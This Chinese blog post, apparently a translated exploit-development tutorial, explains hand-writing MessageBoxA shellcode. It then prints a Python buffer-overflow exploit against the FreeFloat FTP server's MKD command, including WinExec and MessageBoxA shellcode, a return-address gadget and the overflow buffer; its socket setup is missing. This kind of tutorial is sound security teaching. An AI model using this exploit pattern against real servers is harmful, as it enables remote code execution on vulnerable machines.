

发布于 2025-01-03 23:32:54 字数 7788 浏览 0 评论 0 收藏 0

接下来写 MessageBoxA shellcode, 先看看这个函数的参数。

Structure:                Parameters:

int WINAPI MessageBox(      =>    user32.dll 的 MessageBoxA 地址
  __in_opt  HWND hWnd,      =>    0x00000000 (NULL = No Window Owner)
  __in_opt  LPCTSTR lpText,   =>    指向"Pop the box!"
  __in_opt  LPCTSTR lpCaption,  =>    指向"b33f"
  __in    UINT uType      =>    0x00000000 (MB_OK|MB_APPLMODAL)

看起来有点复杂,但是没有什么不能解决的. 和前面不同的是这里有两个 ASCII 字符串需要处理。

先用 arwin 在 user32.dll 找到 MessageBoxA 的地址

arwin.exe user32.dll MessageBoxA


ASCII Text:                       ASCII Text:
b33f                          Pop the box!

Split Text into groups of 4 characters:         Split Text into groups of 4 characters:
"b33f"                          "Pop "
                            "the "

Reverse the order of the character groups:        Reverse the order of the character groups:
"b33f"                          "box!"
                            "the "
                            "Pop "

Look on google for a ASCII to hex converter       Look on google for a ASCII to hex converter
and convert each character while maintaining      and convert each character while maintaining
the order:                        the order:
"\x62\x33\x33\x66"                    "\x62\x6F\x78\x21"

To write these values to the stack simply add       To write these values to the stack simply add
"\x68" infront of each group:               "\x68" infront of each group:
"\x68\x62\x33\x33\x66" => PUSH "b33f"           "\x68\x62\x6F\x78\x21" => PUSH "box!"
                            "\x68\x74\x68\x65\x20" => PUSH "the "
                            "\x68\x50\x6F\x70\x20" => PUSH "Pop "

还有两个参数:hWnd 和 uType. 这两个参数都设置为 0x00000000 就好了,很方便,通过异或一个寄存器就可以. 反正我们之前也是要异或寄存器得到\x00 作为 ASCII 字符串结束符。

这是我写的 shellcode(当然,你可以写你自己的

"\x33\xc0"       => XOR EAX,EAX      |  Zero out EAX register
"\x50"         => PUSH EAX       |  Push EAX to have null-byte padding for "b33f"
"\x68\x62\x33\x33\x66" => PUSH "b33f"      |  Push The ASCII string to the stack
"\x8B\xCC"       => MOV ECX,ESP      |  Put a pointer to lpCaption string in ECX
"\x50"         => PUSH EAX       |  Push EAX to have null-byte padding for "Pop the box!"
"\x68\x62\x6F\x78\x21" => PUSH "box!"      \  
"\x68\x74\x68\x65\x20" => PUSH "the "       | Push The ASCII string to the stack
"\x68\x50\x6F\x70\x20" => PUSH "Pop "      /  
"\x8B\xD4"       => MOV EDX,ESP      |  Put a pointer to lpText string in EDX
"\x50"         => PUSH EAX       |  Push uType=0x00000000
"\x51"         => PUSH ECX       |  Push lpCaption
"\x52"         => PUSH EDX       |  Push lpText
"\x50"         => PUSH EAX       |  Push hWnd=0x00000000
"\xBE\xEA\x07\x45\x7E" => MOV ESI,7E4507EA   |  Move the pointer to MessageBoxA() into ESI
"\xFF\xD6"       => CALL ESI       |  Call MessageBoxA()

看下面的截图,参数显示正确,继续运行将会弹出 一个消息框。

# Exploit: FreeFloat FTP (MKD BOF)                         #
# OS: WinXP PRO SP3                                #
# Author: b33f (Ruben Boonen)                            #
# Software: http://www.freefloat.com/software/freefloatftpserver.zip         #
# This exploit was created for Part 6 of my Exploit Development tutorial       #
# series - http://www.fuzzysecurity.com/tutorials/expDev/6.html          #
import socket
import sys
# (*) WinExec                                    #
# (*) arwin.exe => Kernel32.dll - WinExec 0x7C862AED                 #
# (*) MSDN Structure:                                #
#                                          #
# UINT WINAPI WinExec(      => PTR to WinExec                #
#   __in  LPCSTR lpCmdLine,     => calc.exe                    #
#   __in  UINT uCmdShow       => 0x1                       #
# );                                         #
#                                          #
# Final Size => 26-bytes (metasploit version size => 227-bytes)          #
WinExec = (
"\x33\xc0"              # XOR EAX,EAX
"\x50"                # PUSH EAX    => padding for lpCmdLine
"\x68\x2E\x65\x78\x65"        # PUSH ".exe"
"\x68\x63\x61\x6C\x63"        # PUSH "calc"
"\x8B\xC4"              # MOV EAX,ESP
"\x6A\x01"              # PUSH 1
"\x50"                # PUSH EAX
"\xBB\xED\x2A\x86\x7C"        # MOV EBX,kernel32.WinExec
"\xFF\xD3")             # CALL EBX
# (*) MessageBoxA                                  #
# (*) arwin.exe => user32.dll - MessageBoxA 0x7E4507EA               #
# (*) MSDN Structure:                                #
#                                          #
# int WINAPI MessageBox(      => PTR to MessageBoxA              #
#   __in_opt  HWND hWnd,      => 0x0                       #
#   __in_opt  LPCTSTR lpText,   => Pop the box!                  #
#   __in_opt  LPCTSTR lpCaption,  => b33f                      #
#   __in    UINT uType      => 0x0                       #
# );                                         #
#                                          #
# Final Size => 39-bytes (metasploit version size => 287-bytes)          #
MessageBoxA = (
"\x33\xc0"              # XOR EAX,EAX
"\x50"                # PUSH EAX    => padding for lpCaption
"\x68\x62\x33\x33\x66"        # PUSH "b33f"
"\x8B\xCC"              # MOV ECX,ESP   => PTR to lpCaption
"\x50"                # PUSH EAX    => padding for lpText
"\x68\x62\x6F\x78\x21"        # PUSH "box!"
"\x68\x74\x68\x65\x20"        # PUSH "the "
"\x68\x50\x6F\x70\x20"        # PUSH "Pop "
"\x8B\xD4"              # MOV EDX,ESP   => PTR to lpText
"\x50"                # PUSH EAX - uType=0x0
"\x51"                # PUSH ECX - lpCaption
"\x52"                # PUSH EDX - lpText
"\x50"                # PUSH EAX - hWnd=0x0
"\xBE\xEA\x07\x45\x7E"        # MOV ESI,USER32.MessageBoxA
"\xFF\xD6")             # CALL ESI
# Badchars: \x00\x0A\x0D                               #
# 0x77c35459 : push esp #  ret  | msvcrt.dll                     #
# shellcode at ESP => space 749-bytes                        #
buffer = "\x90"*20 + MessageBoxA
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))
s.send('USER anonymous\r\n')
s.send('PASS anonymous\r\n')
s.send('MKD ' + evil + '\r\n')

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